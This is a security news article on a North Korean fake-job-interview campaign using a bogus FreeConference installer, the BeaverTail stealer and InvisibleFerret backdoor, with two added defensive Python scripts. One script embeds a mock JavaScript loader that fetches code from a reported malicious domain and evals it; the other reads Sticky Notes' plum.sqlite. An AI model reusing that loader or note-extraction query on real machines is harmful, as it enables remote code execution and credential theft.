Thursday, April 3, 2025

North Korean state-backed hackers have been linked to a malicious Windows application that poses as a free conference-calling service and targets job seekers.

The threat actors used a fake Windows video-conferencing tool impersonating FreeConference.com to backdoor developer systems as part of a financially motivated campaign tracked as Contagious Interview.

The latest attack wave, spotted by Singaporean cybersecurity company Group-IB in mid-August 2024, is another example of the threat actors abusing native installers for Windows and Apple macOS to deliver malware.

Contagious Interview, also tracked under the name DEV#POPPER, has been attributed to the North Korean threat actor that CrowdStrike tracks as Famous Chollima.

The attack chain starts with a fake job interview in which the victim is tricked into installing and running a Node.js project presented as a coding challenge. That project downloads the BeaverTail malware, which in turn drops InvisibleFerret, a cross-platform Python backdoor with remote control, keylogging and browser data-theft capabilities.

BeaverTail, a JavaScript information stealer, has typically been distributed as malicious code embedded in the supposed technical assessment given during the hiring process.

In July 2024, the actors were observed using Windows MSI installers and Apple macOS disk image (DMG) files impersonating the legitimate MiroTalk video-conferencing software to deliver an updated version of BeaverTail.

Group-IB's latest findings attribute the campaign to the Lazarus Group and show that the threat actor continues to rely on the same distribution mechanism, with one key difference: the installer ("FCCCall.msi") now masquerades as FreeConference.com rather than MiroTalk.

The malicious installer is believed to have been downloaded from a site at freeconference.io, which shares a registrar with the fake mirotalk.web domain.

According to security researcher Sharmine Low, Lazarus is also actively seeking out potential targets on job search platforms such as WWR, Moonlight and Upwork, in addition to LinkedIn.

After initial contact, the conversation moves to Telegram, where candidates are asked to download a video-conferencing application or complete a Node.js-based technical exercise as part of the interview process.

The threat actors have also been observed injecting malicious JavaScript into cryptocurrency- and gaming-related repositories, a sign that the campaign keeps adapting. The injected JavaScript is designed to fetch the BeaverTail JavaScript code from either the ipcheck[.]cloud or the regioncheck[.]web domain.

This behavior was recently highlighted by software supply chain security firm Phylum in connection with an npm package called …, suggesting the threat actors are using several propagation vectors at once.
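A practitioner handed a repository or npm package from an "interview" will want to check it before running `npm install`. The script below is an added example, not Group-IB's or Phylum's detection logic: it walks a checkout and flags files that contain the two loader domains named above (kept defanged in the source) or that match a generic fetch-then-eval shape. The heuristic regexes, the file suffix list and the constructed sample project in `demo()` are my own assumptions.

```python
"""Hunt a checked-out repository or npm package for the remote-loader pattern
described above: JavaScript that pulls a second stage from ipcheck[.]cloud or
regioncheck[.]web and runs it. The two domains are the ones the report names;
the generic fetch-then-eval heuristic and the sample files are my own
constructions, not Group-IB's or Phylum's detection logic."""
import re
import tempfile
from pathlib import Path

# Indicators quoted in the report, kept defanged; refanged at match time.
REPORTED_DOMAINS = ["ipcheck[.]cloud", "regioncheck[.]web"]

# Assumed stager shape: an HTTP fetch whose response body reaches a code sink.
FETCH_RE = re.compile(
    r"require\(\s*['\"](?:https?|axios|node-fetch)['\"]\s*\)|\bfetch\(|\.get\(")
EVAL_RE = re.compile(r"\beval\(|new\s+Function\(|vm\.runIn\w+Context\(")

SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".json"}  # .json covers package.json scripts


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def scan_source(text: str) -> list:
    """Return tags for each indicator or heuristic that fires on one file."""
    hits = []
    for indicator in REPORTED_DOMAINS:
        if indicator in text or refang(indicator) in text:
            hits.append(f"ioc:{indicator}")
    if FETCH_RE.search(text) and EVAL_RE.search(text):
        hits.append("heuristic:fetch-then-eval")
    return hits


def scan_repo(root) -> dict:
    """Map relative file path -> hits for every flagged file under root.
    node_modules is skipped; run this before `npm install`, not after."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.suffix.lower() not in SCAN_SUFFIXES or "node_modules" in path.parts:
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        hits = scan_source(text)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo() -> dict:
    """Constructed sample project (benign file + mock loader), scanned in a temp dir."""
    with tempfile.TemporaryDirectory() as root:
        src = Path(root, "src")
        src.mkdir()
        (src / "add.js").write_text("export const add = (a, b) => a + b;\n")
        (src / "config.js").write_text(
            "const h = require('https');\n"
            "h.get('https://regioncheck.web/api', r => {\n"
            "  let d = ''; r.on('data', c => d += c);\n"
            "  r.on('end', () => eval(d));\n"
            "});\n")
        return scan_repo(root)


if __name__ == "__main__":
    for file, tags in demo().items():
        print(f"{file}: {', '.join(tags)}")
```

The heuristic will also fire on legitimate plugin loaders, so treat it as a triage signal; the domain matches are the hard indicators. Scanning `.json` files catches a loader hidden in a `postinstall` script, which runs before anyone reads the code.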

Notable changes include configuring BeaverTail to extract data from additional cryptocurrency wallet extensions such as Kaikas, Rabby, Argent X and Exodus Web3, and adding functionality to establish persistence via AnyDesk.

BeaverTail's information-stealing functions are implemented through a set of Python scripts collectively tracked as CivetQ, which can harvest cookies, web browser data, keystrokes and clipboard contents, and deliver further scripts. In total, 74 browser extensions are targeted.

The malware can also steal data from Microsoft Sticky Notes by reading the application's SQLite database at `%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`, where user notes are stored in plaintext.

“Through queries that tap into the database’s vast repository of information, the malicious software is able to extract and illicitly transmit sensitive data stored in the user’s Sticky Notes application.”
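The Sticky Notes theft described above needs nothing more than a read-only SQLite query, and the same query lets a defender see what an intruder would have obtained. The script below is an added example, not code from the Group-IB report: the database path is the one quoted above, while the `Note` table and `Text` column, the secret-keyword list and the three fake notes built in `demo()` are my assumptions.

```python
"""Show what the Sticky Notes theft amounts to and let a defender check their
own exposure: one read-only SQLite query against plum.sqlite. The path is the
one quoted above; the table/column names (Note.Text) and the sample database
are my assumptions, not something the report documents."""
import os
import re
import sqlite3
import tempfile
from pathlib import Path

# Location from the report, left with %LocalAppData% unexpanded for portability.
STICKY_NOTES_DB = os.path.join(
    "%LocalAppData%", "Packages",
    "Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", "LocalState", "plum.sqlite")

# Assumed words that mark a note a stealer would find valuable.
SECRET_RE = re.compile(r"(?i)\b(pass(word)?|pwd|api[_ -]?key|secret|token|seed phrase)\b")


def default_db_path() -> Path:
    """Expand the %LocalAppData% placeholder on the machine being checked."""
    return Path(os.path.expandvars(STICKY_NOTES_DB))


def read_notes(db_path) -> list:
    """Return note bodies. mode=ro&immutable=1 opens the file without taking
    locks, so a database still held open by StickyNotes.exe reads cleanly."""
    uri = Path(db_path).resolve().as_uri() + "?mode=ro&immutable=1"
    con = sqlite3.connect(uri, uri=True)
    try:
        rows = con.execute("SELECT Text FROM Note").fetchall()  # assumed schema
    finally:
        con.close()
    return [text for (text,) in rows if text]


def find_secret_like(notes) -> list:
    """Triage: which notes would have handed over credentials or wallet seeds?"""
    return [n for n in notes if SECRET_RE.search(n)]


def demo() -> tuple:
    """Constructed stand-in for plum.sqlite (three fake notes), read back and triaged."""
    with tempfile.TemporaryDirectory() as d:
        db = Path(d, "plum.sqlite")
        con = sqlite3.connect(db)
        con.execute("CREATE TABLE Note (Id TEXT PRIMARY KEY, Text TEXT)")
        con.executemany("INSERT INTO Note VALUES (?, ?)", [
            ("n1", "Groceries: eggs, coffee"),
            ("n2", "vpn password: hunter2"),
            ("n3", "wallet seed phrase: twelve words here"),
        ])
        con.commit()
        con.close()
        notes = read_notes(db)
        return notes, find_secret_like(notes)


if __name__ == "__main__":
    target = default_db_path()
    notes = read_notes(target) if target.exists() else demo()[0]
    print(f"{len(notes)} notes, {len(find_secret_like(notes))} look like secrets")
```

Run on a Windows host it reads the live database; elsewhere it falls back to the constructed sample. Because the file is a plain SQLite database readable by any process running as the user, the practical mitigation is not to keep credentials or wallet seed phrases in Sticky Notes at all, and to alert on processes other than the Sticky Notes app opening `plum.sqlite`.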

CivetQ's modular design, together with the incremental changes observed over recent months, indicates that the tooling is under active development.

According to Low, the Lazarus Group has significantly refined its tactics, adopting new tools and techniques to better conceal its activity. Its campaign against job seekers, observed through at least mid-2024, shows no sign of slowing down, and the attacks have become more sophisticated and now span more online platforms.

The findings come as the U.S. Federal Bureau of Investigation (FBI) has warned that North Korean cyber actors are aggressively targeting the cryptocurrency industry, using well-disguised social engineering to steal digital assets.

The FBI notes that these social engineering schemes are complex and elaborate, and often compromise victims with sophisticated technical expertise. The actors conduct reconnaissance by reviewing potential victims' activity on professional networking and job search platforms.

North Korean actors identify specific decentralized finance (DeFi) or cryptocurrency companies as targets and use social engineering to deceive several employees at those organizations in order to gain unauthorized access to their networks.
